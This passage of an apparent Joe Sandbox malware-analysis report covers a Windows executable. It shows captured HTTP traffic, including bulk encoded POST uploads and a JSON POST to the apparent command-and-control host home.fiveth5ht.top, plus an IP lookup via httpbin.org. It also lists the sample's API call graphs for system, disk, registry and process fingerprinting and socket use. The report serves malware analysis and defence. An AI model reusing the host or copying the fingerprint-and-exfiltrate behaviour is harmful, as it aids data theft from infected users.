                                              Dec 27, 2024 09:02:02.493808031 CET2472OUTData Raw: 38 41 44 6c 76 44 61 36 46 38 62 76 68 48 72 45 76 68 5c 2f 77 41 56 74 61 57 30 63 6b 4e 76 70 5c 2f 69 4f 47 4a 6f 37 62 78 44 59 52 51 79 74 62 6f 37 53 57 47 74 70 61 4a 44 70 73 65 74 78 36 51 6a 36 66 4c 34 42 65 66 73 47 66 74 6c 2b 4a 62
                                              Data Ascii: 8ADlvDa6F8bvhHrEvh\/wAVtaW0ckNvp\/iOGJo7bxDYRQytbo7SWGtpaJDpsetx6Qj6fL4BefsGftl+JbT\/AIRzxz\/wVE+Lup+CrhVttR07wh8IfDPw+8W3mnqhhNsnjzSfGt9qsEstuzR3VxLaXYvGYyXUEpJU\/wAT5d4hYC+e5lwx4lZb4eUeLsbic74g4Yz\/AIRzTPcTknEGYYavhc3x3BObZbkOfQpQxdDF42hgsRV
                                              Dec 27, 2024 09:02:02.493849039 CET2472OUTData Raw: 36 6a 71 78 55 63 6e 62 38 61 44 6f 4b 72 52 5c 2f 69 50 79 70 74 57 4b 59 5c 2f 54 38 66 36 47 67 30 70 39 66 6c 2b 70 57 38 76 33 5c 2f 54 5c 2f 36 39 52 31 59 6f 6f 4e 43 6c 49 76 38 66 70 5c 2f 68 32 70 6c 57 70 65 5c 2f 2b 37 5c 2f 6a 55 47
                                              Data Ascii: 6jqxUcnb8aDoKrR\/iPyptWKY\/T8f6Gg0p9fl+pW8v3\/T\/69R1YooNClIv8fp\/h2plWpe\/+7\/jUGw+3+fwoOgh7v9B\/KoqsVXrT2fn+H\/BNqdT5\/r\/wf+DoFR+X7\/p\/9epKjH\/LT8f61mdHv\/3fxIZFx+H8j\/n+dQ1YqF\/vH8P5Cg1535f18yuy7cd802rFRP1\/D+poNRlQSR\/L1z+H+evSp6KDoKUkfy
                                              Dec 27, 2024 09:02:02.493859053 CET2472OUTData Raw: 2f 65 33 48 6c 52 5c 2f 36 5c 2f 38 41 35 64 66 31 35 36 63 56 6d 41 66 33 5c 2f 77 44 72 6c 35 75 5a 50 79 39 5c 2f 36 2b 76 72 54 50 38 41 67 63 61 66 38 74 66 74 48 72 33 39 76 54 5c 2f 4f 65 58 78 37 50 4d 7a 76 32 52 38 66 39 4e 36 5a 39 37
                                              Data Ascii: /e3HlR\/6\/8A5df156cVmAf3\/wDrl5uZPy9\/6+vrTP8Agcaf8tftHr39vT\/OeXx7PMzv2R8f9N6Z97+PY\/mmL\/Vf67\/P659+Q6Bkm\/5Njxv+9\/56\/l+HTpTPusn8f+xJ+XantseObf5ieZ\/2wx\/n\/wCvkU+P956o\/wDyyjkix\/n8fegCnJ\/eT6+V+Zx\/Lp+XepPMQSf6nyZp\/wB7n\/Xcdf8ARMZ\/zx6
                                              Dec 27, 2024 09:02:02.613302946 CET4944OUTData Raw: 6f 58 6a 6a 77 58 70 6e 68 58 78 5c 2f 61 5c 2f 44 58 52 5c 2f 69 62 38 46 76 69 42 34 74 74 50 32 6e 5c 2f 68 6e 2b 79 46 38 51 4c 44 77 4a 34 6c 2b 4a 6f 66 34 51 66 47 72 34 76 33 32 6f 36 66 38 50 64 4c 2b 49 30 58 6a 6e 34 4e 2b 42 37 6b 36
                                              Data Ascii: oXjjwXpnhXx\/a\/DXR\/ib8FviB4ttP2n\/hn+yF8QLDwJ4l+Jof4QfGr4v32o6f8PdL+I0Xjn4N+B7k6B4iu9D8Q29n4p8AwePNEa88O6tYC7OoCwtb\/AMp8L6xpfiyX4UJp\/iLwX9h+MPwu1j4y+GvEUusa7H4X0z4e+E9Q+I9h4\/1\/xJqc\/hKC9tLf4df8Km8e3fjB9I0rXIrSy0G4m0yXVi8KSfleD8b\/AAjx8HU
                                              Dec 27, 2024 09:02:02.613353968 CET2472OUTData Raw: 34 4c 63 5c 2f 74 47 64 76 68 56 38 44 52 39 64 4e 2b 49 52 5c 2f 6c 38 51 56 71 4d 5c 2f 77 44 42 62 6a 39 70 4c 74 38 4c 66 67 53 50 72 70 50 78 45 50 38 41 4c 34 6a 4c 58 35 47 51 61 50 34 63 74 57 2b 4b 68 38 61 66 48 48 34 41 66 44 65 32 2b
                                              Data Ascii: 4Lc\/tGdvhV8DR9dN+IR\/l8QVqM\/wDBbj9pLt8LfgSPrpPxEP8AL4jLX5GQaP4ctW+Kh8afHH4AfDe2+CWp\/CPwl8UrrxNrfxp8RR+D\/ij8Yrbx7daP8Ib1fhN8BPiW99498MJ8OfEMHjhtFXVPB+gakItEXxdfa5a61pmkZ1hpuj6l4I8J+KLP4s\/Ba68UfEP4b\/HT4u\/DX4Qw6p8Yx8SviH8PP2d9U+JGn\/EjxB4d
                                              Dec 27, 2024 09:02:02.613364935 CET2472OUTData Raw: 35 45 32 62 50 2b 65 75 4d 34 5c 2f 6e 5c 2f 6e 36 55 48 56 54 71 66 31 33 38 31 5c 2f 58 5c 2f 41 41 49 76 4c 5c 2f 37 37 7a 35 76 36 64 4f 6e 39 50 61 6f 4a 50 33 69 6f 6e 33 33 4f 50 4e 2b 76 35 2b 6c 57 76 34 7a 38 6d 5c 2f 70 36 2b 6e 2b 65
                                              Data Ascii: 5E2bP+euM4\/n\/n6UHVTqf1381\/X\/AAIvL\/77z5v6dOn9PaoJP3ion33OPN+v5+lWv4z8m\/p6+n+ef6VB8hZB\/rvL\/wC2A\/49fy\/n+lB0lYb4\/wDljvPP+f8AOP55h2v8m9Pk\/wA+\/wDn+VmTZ\/c65\/5a9OnSq33djr9\/zbjpx534Vp7Ty\/H\/AIBrDb5\/oiFt+75Pk\/659v8AD0p8kn7vYif6v\/lp\/
                                              Dec 27, 2024 09:02:02.613616943 CET4944OUTData Raw: 34 33 6a 6a 63 66 66 37 79 38 55 48 51 51 5c 2f 4b 6d 7a 66 35 65 7a 5c 2f 6e 6e 5c 2f 4c 5c 2f 36 39 4c 2b 38 38 74 30 32 66 38 73 76 33 73 6e 6d 5c 2f 77 44 6b 72 5c 2f 6e 36 30 6b 61 5c 2f 63 32 4c 73 63 79 35 38 75 54 6a 5c 2f 41 43 61 46 2b
                                              Data Ascii: 43jjcff7y8UHQQ\/Kmzf5ez\/nn\/L\/69L+88t02f8sv3snm\/wDkr\/n60ka\/c2Lscy58uTj\/ACaF+Zdm+P8A6ZeZ1\/Uf8eNae08vx\/4AH6\/fHrTLzWfg\/wCPtMsI\/OvLzQ3igjGfncXNs+PlDH7qnoDXnnxx\/aj+G\/xQ\/aa8Y\/GL4haN4Zl+D3wa\/wCClnw8\/aL8FeH\/AIa\/ApPAcH7bn7NureI7bQPGG
                                              Dec 27, 2024 09:02:11.959888935 CET309INHTTP/1.1 502 Bad Gateway
                                              Server: nginx/1.22.1
                                              Date: Fri, 27 Dec 2024 08:02:11 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.10497375.101.3.217808088C:\Users\user\Desktop\PqHnYMj5eF.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 27, 2024 09:02:12.859179974 CET350OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                              Host: home.fiveth5ht.top
                                              Accept: */*
                                              Content-Type: application/json
                                              Content-Length: 209
                                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                              Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
                                              Dec 27, 2024 09:02:14.382074118 CET309INHTTP/1.1 502 Bad Gateway
                                              Server: nginx/1.22.1
                                              Date: Fri, 27 Dec 2024 08:02:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.10497043.218.7.1034438088C:\Users\user\Desktop\PqHnYMj5eF.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-27 08:01:59 UTC52OUTGET /ip HTTP/1.1
                                              Host: httpbin.org
                                              Accept: */*
                                              2024-12-27 08:01:59 UTC224INHTTP/1.1 200 OK
                                              Date: Fri, 27 Dec 2024 08:01:59 GMT
                                              Content-Type: application/json
                                              Content-Length: 31
                                              Connection: close
                                              Server: gunicorn/19.9.0
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: true
                                              2024-12-27 08:01:59 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                              Data Ascii: { "origin": "8.46.123.189"}


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:01:54
                                              Start date:27/12/2024
                                              Path:C:\Users\user\Desktop\PqHnYMj5eF.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PqHnYMj5eF.exe"
                                              Imagebase:0x3c0000
                                              File size:4'495'872 bytes
                                              MD5 hash:5A249494869B3EF440BD31B438958585
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:2.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:18.5%
                                                Total number of Nodes:270
                                                Total number of Limit Nodes:45
                                                execution_graph 69443 3c255d 69444 749f70 69443->69444 69445 3c256c GetSystemInfo 69444->69445 69446 3c2589 69445->69446 69447 3c25a0 GlobalMemoryStatusEx 69446->69447 69452 3c25ec 69447->69452 69448 3c2762 69451 3c27d6 KiUserCallbackDispatcher 69448->69451 69449 3c263c GetDriveTypeA 69450 3c2655 GetDiskFreeSpaceExA 69449->69450 69449->69452 69450->69452 69453 3c27f8 69451->69453 69452->69448 69452->69449 69454 3c28d9 FindFirstFileW 69453->69454 69455 3c2906 FindNextFileW 69454->69455 69456 3c2928 69454->69456 69455->69455 69455->69456 69457 3c3d5e 69462 3c3d30 69457->69462 69458 3c3d90 69466 3cfcb0 closesocket 69458->69466 69461 3c3dc1 69462->69457 69462->69458 69463 3d0ab0 69462->69463 69467 3d05b0 69463->69467 69465 3d0acd 69465->69462 69466->69461 69468 3d05bd 69467->69468 69473 3d07c7 69467->69473 69469 3d0707 WSAEventSelect 69468->69469 69470 3d07ef 69468->69470 69468->69473 69481 3c76a0 69468->69481 69469->69468 69469->69473 69470->69473 69475 3d0847 69470->69475 69477 3d6fa0 69470->69477 69473->69465 69474 3d09e8 WSAEnumNetworkEvents 69474->69475 69476 3d09d0 WSAEventSelect 69474->69476 69475->69473 69475->69474 69475->69476 69476->69474 69476->69475 69479 3d6fd4 69477->69479 69480 3d6feb 69477->69480 69478 3d7207 select 69478->69480 69479->69478 69479->69480 69480->69475 69482 3c76e6 send 69481->69482 69483 3c76c0 69481->69483 69484 3c76c9 69482->69484 69483->69482 69483->69484 69484->69468 69343 3c29ff FindFirstFileA 69344 3c2a31 69343->69344 69345 3c2a5c RegOpenKeyExA 69344->69345 69346 3c2a93 69345->69346 69347 3c2ade CharUpperA 69346->69347 69349 3c2b0a 69347->69349 69348 3c2bf9 QueryFullProcessImageNameA 69350 3c2c3b CloseHandle 69348->69350 69349->69348 69351 3c2c64 69350->69351 69352 3c2df1 CloseHandle 69351->69352 69353 3c2e23 69352->69353 69354 3d1139 69355 3d0f00 69354->69355 69356 3d0f7b 69355->69356 69358 3fd4d0 closesocket 69355->69358 69358->69355 69359 473c00 69360 473c23 69359->69360 69362 473c0d 69359->69362 69360->69362 69363 48b180 69360->69363 69366 48b19b 69363->69366 69370 48b2e3 69363->69370 69367 48b2a9 getsockname 69366->69367 69369 48b020 closesocket 69366->69369 69366->69370 69371 48af30 69366->69371 69375 48b060 69366->69375 69380 48b020 69367->69380 69369->69366 69370->69362 69372 48af4c 69371->69372 69373 48af63 socket 69371->69373 69372->69373 69374 48af52 69372->69374 69373->69366 69374->69366 69378 48b080 69375->69378 69376 48b0b0 connect 69377 48b0bf WSAGetLastError 69376->69377 69377->69378 69379 48b0ea 69377->69379 69378->69376 69378->69377 69378->69379 69379->69366 69381 48b029 69380->69381 69382 48b052 69380->69382 69383 48b04b closesocket 69381->69383 69384 48b03e 69381->69384 69382->69366 69383->69382 69384->69366 69485 474720 69489 474728 69485->69489 69486 474733 69488 474774 69489->69486 69496 47476c 69489->69496 69497 475540 closesocket 69489->69497 69491 47482e 69491->69496 69498 479270 69491->69498 69493 474860 69503 474950 69493->69503 69495 474878 69496->69495 69509 4730a0 closesocket 69496->69509 69497->69491 69510 47a440 69498->69510 69500 479297 69501 4792ab 69500->69501 69538 47bbe0 closesocket 69500->69538 69501->69493 69504 474966 69503->69504 69506 4749c5 69504->69506 69508 4749b9 69504->69508 69539 47bbe0 closesocket 69504->69539 69505 474aa0 gethostname 69505->69506 69505->69508 69506->69496 69508->69505 69508->69506 69509->69488 69536 47a46b 69510->69536 69511 47aa03 RegOpenKeyExA 69512 47aa27 RegQueryValueExA 69511->69512 69513 47ab70 RegOpenKeyExA 69511->69513 69514 47aa71 69512->69514 69515 47aacc RegQueryValueExA 69512->69515 69516 47ac34 RegOpenKeyExA 69513->69516 69535 47ab90 69513->69535 69514->69515 69521 47aa85 RegQueryValueExA 69514->69521 69518 47ab66 RegCloseKey 69515->69518 69519 47ab0e 69515->69519 69517 47acf8 RegOpenKeyExA 69516->69517 69534 47ac54 69516->69534 69520 47ad56 RegEnumKeyExA 69517->69520 69526 47ad14 69517->69526 69518->69513 69519->69518 69525 47ab1e RegQueryValueExA 69519->69525 69522 47ad9b 69520->69522 69520->69526 69524 47aab3 69521->69524 69523 47ae16 RegOpenKeyExA 69522->69523 69527 47ae34 RegQueryValueExA 69523->69527 69528 47addf RegEnumKeyExA 69523->69528 69524->69515 69531 47ab4c 69525->69531 69526->69500 69529 47af43 RegQueryValueExA 69527->69529 69537 47adaa 69527->69537 69528->69523 69528->69526 69530 47b052 RegQueryValueExA 69529->69530 69529->69537 69532 47adc7 RegCloseKey 69530->69532 69530->69537 69531->69518 69532->69528 69533 47afa0 RegQueryValueExA 69533->69537 69534->69517 69535->69516 69536->69511 69536->69526 69537->69529 69537->69530 69537->69532 69537->69533 69538->69501 69539->69508 69385 48a080 69388 489740 69385->69388 69387 48a09b 69389 489780 69388->69389 69393 48975d 69388->69393 69390 489925 RegOpenKeyExA 69389->69390 69389->69393 69391 48995a RegQueryValueExA 69390->69391 69390->69393 69392 489986 RegCloseKey 69391->69392 69392->69393 69393->69387 69540 3c2f17 69544 3c2f2c 69540->69544 69541 3c31d3 69542 3c2fb3 RegOpenKeyExA 69542->69544 69543 3c315c RegEnumKeyExA 69543->69544 69544->69541 69544->69542 69544->69543 69545 3c3046 RegOpenKeyExA 69544->69545 69547 3c313b RegCloseKey 69544->69547 69545->69544 69546 3c3089 RegQueryValueExA 69545->69546 69546->69544 69546->69547 69547->69544 69548 3c31d7 69551 3c31f4 69548->69551 69549 3c3200 69550 3c32dc CloseHandle 69550->69549 69551->69549 69551->69550 69394 3f95b0 69395 3f95c8 69394->69395 69397 3f95fd 69394->69397 69395->69397 69398 3fa150 69395->69398 69399 3fa15f 69398->69399 69401 3fa1d0 69398->69401 69400 3fa181 getsockname 69399->69400 69399->69401 69400->69401 69401->69397 69552 3f8b50 69553 3f8b6b 69552->69553 69568 3f8bb5 69552->69568 69554 3f8b8f 69553->69554 69555 3f8bf3 69553->69555 69553->69568 69587 3d6e40 select 69554->69587 69572 3fa550 69555->69572 69558 3f8bfc 69561 3f8c1f connect 69558->69561 69562 3f8c35 69558->69562 69558->69568 69570 3f8cb2 69558->69570 69559 3f8cd9 SleepEx 69566 3f8d14 69559->69566 69560 3f8dff 69560->69568 69588 3c78b0 closesocket 69560->69588 69561->69562 69565 3fa150 getsockname 69562->69565 69563 3fa150 getsockname 69563->69560 69569 3f8ba1 69565->69569 69567 3f8d43 69566->69567 69566->69570 69571 3fa150 getsockname 69567->69571 69569->69559 69569->69568 69569->69570 69570->69560 69570->69563 69570->69568 69571->69568 69573 3fa575 69572->69573 69576 3fa597 69573->69576 69590 3c75e0 69573->69590 69575 3c78b0 closesocket 69578 3fa713 69575->69578 69577 3fa811 setsockopt 69576->69577 69583 3fa83b 69576->69583 69585 3fa69b 69576->69585 69577->69583 69578->69558 69580 3faf56 69581 3faf5d 69580->69581 69580->69585 69581->69578 69582 3fa150 getsockname 69581->69582 69582->69578 69583->69585 69586 3fabe1 69583->69586 69596 3f6be0 select closesocket 69583->69596 69585->69575 69585->69578 69586->69585 69595 4267e0 ioctlsocket 69586->69595 69587->69569 69589 3c78c5 69588->69589 69589->69568 69591 3c75ef 69590->69591 69592 3c7607 socket 69590->69592 69591->69592 69594 3c7643 69591->69594 69593 3c762b 69592->69593 69593->69576 69594->69576 69595->69580 69596->69586 69597 847830 69599 84785a 69597->69599 69598 847866 69599->69598 69602 7512c0 69599->69602 69601 84789a 69603 7512cc 69602->69603 69606 74e050 69603->69606 69605 7512fa 69605->69601 69607 74e09d 69606->69607 69608 74feb6 isxdigit 69607->69608 69609 74e18e 69607->69609 69608->69607 69609->69605 69610 74b180 Sleep 69611 3c13c9 69615 3c1160 69611->69615 69614 3c13a1 69615->69614 69616 7493e0 69615->69616 69626 748a20 isxdigit 69615->69626 69623 749400 69616->69623 69625 7493f3 69616->69625 69617 749688 69618 7496c7 69617->69618 69617->69625 69627 749280 vfprintf 69617->69627 69628 749220 vfprintf 69618->69628 69621 7496df 69621->69615 69622 749220 vfprintf 69622->69623 69623->69617 69623->69618 69623->69622 69624 749280 vfprintf 69623->69624 69623->69625 69624->69623 69625->69615 69626->69615 69627->69617 69628->69621 69402 475a50 69403 475a58 69402->69403 69409 475ea0 69402->69409 69404 475b50 69403->69404 69414 475a99 69403->69414 69417 475b88 69403->69417 69407 475eb4 69404->69407 69408 475b7a 69404->69408 69404->69417 69405 475e96 69432 489480 closesocket 69405->69432 69433 476f10 socket ioctlsocket connect getsockname closesocket 69407->69433 69423 4770a0 69408->69423 69412 475ec2 69412->69412 69416 4770a0 6 API calls 69414->69416 69414->69417 69430 476f10 socket ioctlsocket connect getsockname closesocket 69414->69430 69416->69414 69417->69405 69419 48a920 69417->69419 69431 489320 closesocket 69417->69431 69420 48a944 69419->69420 69421 48a94b 69420->69421 69422 48a977 send 69420->69422 69421->69417 69422->69417 69427 4770ae 69423->69427 69425 4771a7 69425->69417 69426 47717f 69426->69425 69439 489320 closesocket 69426->69439 69427->69425 69427->69426 69434 48a8c0 69427->69434 69438 4771c0 socket ioctlsocket connect getsockname 69427->69438 69430->69414 69431->69417 69432->69409 69433->69412 69435 48a903 recvfrom 69434->69435 69436 48a8e6 69434->69436 69437 48a8ed 69435->69437 69436->69435 69436->69437 69437->69427 69438->69427 69439->69425 69440 3dd5e0 69441 3dd652 WSAStartup 69440->69441 69442 3dd5f0 69440->69442 69441->69442 69629 3fb400 69630 3fb40b 69629->69630 69631 3fb425 69629->69631 69634 3c7770 69630->69634 69632 3fb421 69635 3c77b6 recv 69634->69635 69636 3c7790 69634->69636 69637 3c7799 69635->69637 69636->69635 69636->69637 69637->69632 69638 3fe400 69639 3fe412 69638->69639 69641 3fe459 69638->69641 69642 3f68b0 closesocket 69639->69642 69642->69641 69643 3fb3c0 69644 3fb3ee 69643->69644 69645 3fb3cb 69643->69645 69647 3c76a0 send 69645->69647 69649 3f9290 69645->69649 69646 3fb3ea 69647->69646 69650 3c76a0 send 69649->69650 69651 3f92e5 69650->69651 69652 3f9392 69651->69652 69653 3f9335 WSAIoctl 69651->69653 69652->69646 69653->69652 69654 3f9366 69653->69654 69654->69652 69655 3f9371 setsockopt 69654->69655 69655->69652

                                                Executed Functions

                                                Function 003FF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                • API String ID: 0-1590685507
                                                • Opcode ID: e06e88ae5fd421d5e9d763ddfa64263602b5e281f81a1b2553fc1228deb0b90a
                                                • Instruction ID: 1b4117995a87f35a404f8a94c1368bd2276a1515d62c2250f5347d1dbe73ce45
                                                • Opcode Fuzzy Hash: e06e88ae5fd421d5e9d763ddfa64263602b5e281f81a1b2553fc1228deb0b90a
                                                • Instruction Fuzzy Hash: 63C28031A043489FD725CF29C484B6AB7E1BF84318F05867DED989B2A2D775ED84CB81
                                                Function 003C255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSystemInfo.KERNELBASE ref: 003C2579
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 003C25CC
                                                • GetDriveTypeA.KERNELBASE ref: 003C2647
                                                • GetDiskFreeSpaceExA.KERNELBASE ref: 003C267E
                                                • KiUserCallbackDispatcher.NTDLL ref: 003C27E2
                                                • FindFirstFileW.KERNELBASE ref: 003C28F8
                                                • FindNextFileW.KERNELBASE ref: 003C291F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                • String ID: ;%<$@$`
                                                • API String ID: 3271271169-644027288
                                                • Opcode ID: 06dc245ec0dca879a15f207bad81bc84d61fc56ce4e6075bc2a9ed757dbfd958
                                                • Instruction ID: d2ec03369ad526f516364d9270d789e0d267b681d0dff383221dcba8deec99ab
                                                • Opcode Fuzzy Hash: 06dc245ec0dca879a15f207bad81bc84d61fc56ce4e6075bc2a9ed757dbfd958
                                                • Instruction Fuzzy Hash: 23D1A0B49087199FCB50EFA8C58569EBBF0FF48344F018969E898D7311E7749A84CF92
                                                Function 003C29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
